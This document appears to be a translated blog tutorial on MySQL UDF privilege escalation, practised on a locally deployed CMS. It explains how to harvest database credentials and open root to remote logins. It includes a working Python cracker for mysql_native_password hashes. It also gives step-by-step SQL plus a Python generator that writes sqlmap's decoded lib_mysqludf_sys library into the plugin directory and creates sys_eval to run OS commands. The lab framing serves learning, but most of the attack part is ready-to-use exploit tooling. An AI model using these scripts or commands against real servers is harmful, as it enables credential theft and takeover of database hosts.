MySQL database UDF privilege escalation learning
2022-07-24 01:41:00 【Goodric】
MySQL database UDF privilege escalation learning
——
Prerequisites for database privilege escalation:
The target server is running the database service, and we have obtained the password of the highest-privilege database user (for MySQL, root).
Apart from Access, essentially every common database engine offers some privilege escalation path.
——
——
Several ways to obtain the database user password
1. Look in the configuration files in the website root
Here I use Xionghai CMS 1.0 as the example; the source was downloaded from the Internet and deployed locally in phpStudy.
Look through the website root directory.
Open, one by one, the files whose names contain sensitive keywords such as conn, config, data, sql, common and inc.
You can also use a code-audit tool to search for these keywords globally.
Opening such a file shows the recorded database configuration, i.e. the connection credentials, in plain text.
——
2. Look in the MySQL data directory under the database installation path
The files /data/mysql/user.MYD and user.MYI (the MyISAM storage of the mysql.user table) hold the account records.
Open user.MYD; it contains the password hashes of the database users.
These hashes are not encrypted passwords and cannot be decrypted; they have to be cracked offline against a dictionary. Here cracking recovers the password root.
——
3. Brute force
Brute-forcing the database password over the network requires the database to accept remote connections; otherwise there is nothing to brute-force against.
Scripts or tools can do the brute forcing; you also need a password dictionary, which can be downloaded online.
Common scripts exist in PHP and Python versions.
The PHP version has one advantage: it sidesteps the problem of the database not accepting remote connections. After getting a shell, upload the PHP MySQL brute-force script to the target server, and the server then brute-forces its own database locally.
That is, even if the target MySQL does not accept remote connections, the password can still be brute-forced.
* Apart from remote brute force, all of the password-recovery methods above assume we already have a webshell. The webshell runs with the privileges of the current (web-server) user, and database privilege escalation can only hand us the privileges of the account the database service itself runs as (on Windows often the service account such as SYSTEM, on Linux typically the mysql user).
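An added example, my own code rather than the post's: offline cracking of the hashes recovered by method 2 (user.MYD / mysql.user), which also shows what method 3's dictionary attack does, only without a network connection. It assumes the accounts use the mysql_native_password plugin, whose hash is '*' + SHA1(SHA1(password)) in upper-case hex with no salt; the sample rows and wordlist are constructed here, not captured from a real server. Accounts using caching_sha2_password (the MySQL 8 default, a salted scheme) are skipped.

```python
"""Offline dictionary attack on mysql_native_password hashes.

Added example for this post, not code from the original. It assumes the
hashes came out of mysql.user (user.MYD, or
SELECT user, host, authentication_string FROM mysql.user; the column is
called `password` before 5.7) and were produced by the mysql_native_password
plugin: '*' + hex(SHA1(SHA1(password))). There is no salt, so one hash
computation per candidate word is matched against every account at once.
Reference vector from the MySQL manual: PASSWORD('mypass') gives
'*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4'.
"""
import hashlib
from typing import Dict, Iterable, List, Optional

HEX_DIGITS = set("0123456789ABCDEF")


def mysql_native_password_hash(password: str) -> str:
    """Reproduce PASSWORD() / mysql_native_password: '*' + SHA1(SHA1(pw))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()  # raw 20 bytes, not hex
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def is_native_hash(value: str) -> bool:
    """41 chars: a leading '*' followed by 40 upper-case hex digits."""
    return len(value) == 41 and value[0] == "*" and set(value[1:]) <= HEX_DIGITS


def parse_user_rows(text: str) -> Dict[str, str]:
    """Parse tab-separated 'user<TAB>host<TAB>hash' lines into {'user@host': hash}.
    Empty hashes (passwordless accounts) and non-native hashes are skipped."""
    accounts: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.rstrip("\r\n").split("\t")
        if len(parts) != 3:
            continue
        user, host, hashed = parts
        hashed = hashed.strip().upper()
        if is_native_hash(hashed):
            accounts[f"{user}@{host}"] = hashed
    return accounts


def crack_accounts(accounts: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Hash each candidate once and look it up against all uncracked accounts."""
    by_hash: Dict[str, List[str]] = {}
    for who, hashed in accounts.items():
        by_hash.setdefault(hashed, []).append(who)
    found: Dict[str, Optional[str]] = {who: None for who in accounts}
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        hit = by_hash.pop(mysql_native_password_hash(candidate), None)
        if hit:
            for who in hit:
                found[who] = candidate
        if not by_hash:  # everything cracked, stop early
            break
    return found


# Constructed sample data: the hashes are computed here, not captured from a
# real server. The third account uses a password that is not in the wordlist,
# the fourth has no password set at all.
SAMPLE_ROWS = "\n".join([
    "root\tlocalhost\t" + mysql_native_password_hash("root"),
    "www\t%\t" + mysql_native_password_hash("P@ssw0rd!"),
    "backup\t127.0.0.1\t" + mysql_native_password_hash("k3Qv-long-random-9f"),
    "nopass\tlocalhost\t",
])
SAMPLE_WORDLIST = ["123456", "password", "root", "admin", "P@ssw0rd!", "mysql"]

if __name__ == "__main__":
    for who, pw in crack_accounts(parse_user_rows(SAMPLE_ROWS), SAMPLE_WORDLIST).items():
        print(f"{who}: {pw if pw is not None else '(not in wordlist)'}")
```

Because the scheme is unsalted, the cost of the attack is one double-SHA1 per dictionary word regardless of how many accounts were dumped, which is why a copied user.MYD is as good as the password itself once the password is in any common wordlist.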
——
——
Remote connections are not enabled
When remote access is not allowed you get this error, saying the host may not connect to the MySQL service:
ERROR 1130 (HY000): Host '192.168.43.153' is not allowed to connect to this MySQL server
First connect locally; in the mysql.user table you can see that root may only connect from localhost.
Execute a statement that lets any IP connect to this MySQL service.
The % after root@ means any host may connect; to allow only one specific host, replace % with that host's IP.
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root';
Looking at the host and user columns of the user table again shows one more row: host:% user:root
Reload the grant tables from the mysql database so the change takes effect:
FLUSH PRIVILEGES;

This is equivalent to enabling remote connections; what used to error out now connects. (In MySQL 8.0 the IDENTIFIED BY clause of GRANT no longer exists: create the account with CREATE USER first and then run the GRANT without it.)
——
——
MySQL database UDF privilege escalation
MySQL has several privilege escalation techniques; here only the UDF technique is tested.
UDF privilege escalation
UDF (user defined function) is MySQL's extension interface: by loading a custom function from a shared library, we can call that function inside MySQL and so extend what MySQL can do, including running operating system commands.
Conditions for UDF privilege escalation:
Be able to log in to MySQL, remotely or locally through a webshell, as a high-privilege account such as root.
MySQL must be allowed to write files, i.e. the value of secure_file_priv is empty (or at least covers the plugin directory).
——
Checking the prerequisites
Execute a statement to view the value of the variable secure_file_priv.
When secure_file_priv is NULL, mysqld does not allow file import or export at all.
When secure_file_priv is /tmp/, mysqld only allows import/export under the /tmp/ directory.
When secure_file_priv has no value (empty string), mysqld places no restriction on import/export.

Here my secure_file_priv is not empty: it is NULL.
Check mysql/my.ini for a secure_file_priv entry; if there is none, add secure_file_priv='' and restart the MySQL service (the variable is read-only at runtime, so it cannot be changed with SET GLOBAL).
Checking again, the value of secure_file_priv is now empty.
——
Uploading the UDF dynamic link library
A dynamic link library is how shared function libraries are implemented; on Windows the file suffix is .dll, on Linux .so. We place this file in a specific directory; it contains functions that execute system commands.
Where the library (.dll or .so) has to go depends on the MySQL version:
MySQL version below 5.1
C:\WINDOWS\udf.dll or C:\WINDOWS\system32\udf.dll
MySQL version 5.1 or later
lib\plugin\udf.dll (under the installation path, i.e. the plugin directory)
My version here is above 5.1, so the file goes to lib\plugin\udf.dll.
The plugin path can be queried with select @@plugin_dir
In practice, though, the plugin folder does not exist by default and has to be created by hand. I am on version 5.7. (There are quite a few conditions.)
As for the DLL itself, you have to get it online or from a toolkit. Some large webshells ("big horse" shells) have this built in and import it with one click.
sqlmap and msf also ship it.
Under sqlmap\data\udf\mysql there are versions for both Windows and Linux.
Run the statement
select @@version_compile_os, @@version_compile_machine;
to check the operating system and architecture the server was built for. Here it shows Windows 64-bit, so the Windows 64-bit DLL is the one to use.
The libraries in sqlmap are encoded so that antivirus does not flag them and cannot be used directly: their suffixes are .dll_ and .so_, and they need to be decoded first.
sqlmap ships the decoder script for this, in the sqlmap/extra/cloak directory.
Run the decoding command from that path:
python3 cloak.py -d -i E:\all-tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

The decoded file is generated next to the original in the same directory.
Then import this file into the \lib\plugin directory.
First upload the DLL to a readable and writable folder via the webshell or a file-upload vulnerability, then move it into the \lib\plugin folder with a MySQL statement. For example, move it from the website root to the \lib\plugin folder.
SQL statement:
select load_file('E:\\phpstudy_pro\\WWW\\lib_mysqludf_sys.dll') into dumpfile 'E:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\lib_mysqludf_sys.dll';
Every backslash in a MySQL string literal must be doubled: a single-backslash \plugin is read as plugin and the file would land in the wrong place.
The DLL is now in the plugin folder.
——
Create the custom function
The function is named sys_eval and is loaded from the DLL imported above; the name after soname is the shared library file name, which MySQL looks up in the plugin directory.
Create the function by referencing the shared library (this is CREATE FUNCTION, not a stored procedure):
create function sys_eval returns string soname 'lib_mysqludf_sys.dll';
View the registered UDFs
select * from mysql.func;
It shows that the sys_eval function was created successfully.
Now the function can be used to execute system commands, for example:
select sys_eval('whoami');

End of the process. The command runs as the account the MySQL service runs under. Afterwards, remove the function with DROP FUNCTION and delete the library from the plugin directory; otherwise a command-execution function stays registered in mysql.func for anyone with database access.
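The whole procedure above (check secure_file_priv and plugin_dir, pick the matching sqlmap library, write it into the plugin directory, create and call sys_eval) as an added example, my code and not the post's or sqlmap's. It generates the SQL rather than executing it, so it runs offline against whatever client you already have; the plugin path and the 4-byte stand-in for the decoded DLL are constructed values. It writes the library through a hex literal with INTO DUMPFILE instead of the post's load_file() move, which removes the separate webshell upload step, and it doubles the backslashes in the path so that lib\plugin is not read as libplugin.

```python
"""Generate the SQL for a MySQL UDF deployment from the values gathered above.

Added example for this post, not code from the original or from sqlmap. It
only builds statements plus a precondition check; feed the output to any
MySQL client. Assumptions: the library is sqlmap's lib_mysqludf_sys, already
decoded with extra/cloak/cloak.py, and @@secure_file_priv, @@plugin_dir,
@@version_compile_os and @@version_compile_machine were read from the target.
"""
from typing import List, Optional


def is_windows(version_compile_os: str) -> bool:
    return "win" in version_compile_os.lower()


def pick_sqlmap_udf(version_compile_os: str, version_compile_machine: str) -> str:
    """sqlmap-relative path of the cloaked library matching the target.
    Layout: data/udf/mysql/{windows,linux}/{32,64}/lib_mysqludf_sys.{dll,so}_
    The 64-bit test is a heuristic over the machine strings MySQL builds report."""
    osname = "windows" if is_windows(version_compile_os) else "linux"
    bits = "64" if version_compile_machine.lower() in ("x86_64", "amd64", "x64") else "32"
    ext = "dll" if osname == "windows" else "so"
    return f"data/udf/mysql/{osname}/{bits}/lib_mysqludf_sys.{ext}_"


def _norm(path: str) -> str:
    """Loose path comparison: forward slashes, no trailing slash, lower case
    (Windows is case-insensitive; on Linux this is only a preflight check)."""
    return path.replace("\\", "/").rstrip("/").lower()


def secure_file_priv_allows(secure_file_priv: Optional[str], dest: str) -> bool:
    """NULL -> no import/export at all; '' -> unrestricted;
    a directory -> only files inside that directory tree."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = _norm(secure_file_priv)
    dest_dir = _norm(dest).rsplit("/", 1)[0]
    return dest_dir == base or dest_dir.startswith(base + "/")


def sql_string(value: str) -> str:
    """Quote a MySQL string literal. Backslashes must be doubled: MySQL reads an
    unknown escape such as '\\p' as plain 'p', so lib\\plugin written with a
    single backslash silently becomes libplugin."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def dumpfile_statement(library: bytes, dest_path: str) -> str:
    """Write the library bytes as a hex literal. Unlike LOAD_FILE() this does
    not need the file to be on the server already."""
    return f"SELECT 0x{library.hex()} INTO DUMPFILE {sql_string(dest_path)};"


def create_function_statement(name: str, soname: str) -> str:
    return f"CREATE FUNCTION {name} RETURNS STRING SONAME {sql_string(soname)};"


def udf_plan(secure_file_priv: Optional[str], plugin_dir: str,
             version_compile_os: str, library: bytes,
             func: str = "sys_eval") -> List[str]:
    """Ordered statements for the deployment; raises ValueError naming the
    first unmet precondition instead of emitting a plan that would fail."""
    if not plugin_dir:
        raise ValueError("@@plugin_dir is empty; cannot locate the plugin directory")
    sep = "\\" if "\\" in plugin_dir else "/"
    libname = "lib_mysqludf_sys.dll" if is_windows(version_compile_os) else "lib_mysqludf_sys.so"
    dest = plugin_dir.rstrip("\\/") + sep + libname
    if not secure_file_priv_allows(secure_file_priv, dest):
        raise ValueError(f"secure_file_priv={secure_file_priv!r} forbids writing {dest}")
    return [
        dumpfile_statement(library, dest),
        create_function_statement(func, libname),
        "SELECT name, dl FROM mysql.func;",
        f"SELECT {func}('whoami');",
    ]


def cleanup_plan(func: str = "sys_eval") -> List[str]:
    """Unregister the function; the library file itself still has to be deleted."""
    return [f"DROP FUNCTION {func};"]


if __name__ == "__main__":
    # Constructed values standing in for a phpStudy-style Windows target; the
    # four bytes stand in for the real decoded DLL contents.
    fake_dll = b"MZ\x90\x00"
    print(pick_sqlmap_udf("Win64", "x86_64"))
    for stmt in udf_plan("", "E:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\", "Win64", fake_dll):
        print(stmt)
    try:
        udf_plan(None, "/usr/lib/mysql/plugin/", "Linux", fake_dll)
    except ValueError as err:
        print("precondition failed:", err)
```

The plan stops with a ValueError when secure_file_priv is NULL or does not cover the plugin directory, which is exactly the state the phpStudy install is in before my.ini is edited and the service restarted. Cleanup is a separate list so the whoami test and the removal are not run in one go.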